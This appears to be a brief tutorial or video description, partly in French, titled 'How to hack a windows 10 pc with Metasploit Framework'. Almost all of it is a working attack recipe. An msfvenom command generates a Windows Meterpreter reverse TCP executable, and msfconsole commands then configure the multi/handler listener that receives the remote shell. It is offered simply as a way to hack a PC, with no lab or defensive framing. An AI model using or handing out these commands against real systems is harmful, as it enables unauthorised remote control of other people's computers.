How to hack a windows 10 pc with Metasploit Framework

How to hack a windows 10 pc with Metasploit Framework

comment pirater un pc windows 10 grâce à Metasploit Framework #https://github.com/rapid7/metasploit-... msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe lhost=your ip adresse lport=4444 -o /root/Desktop/win.exe msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost your ip adresse set lport 4444 exploit or run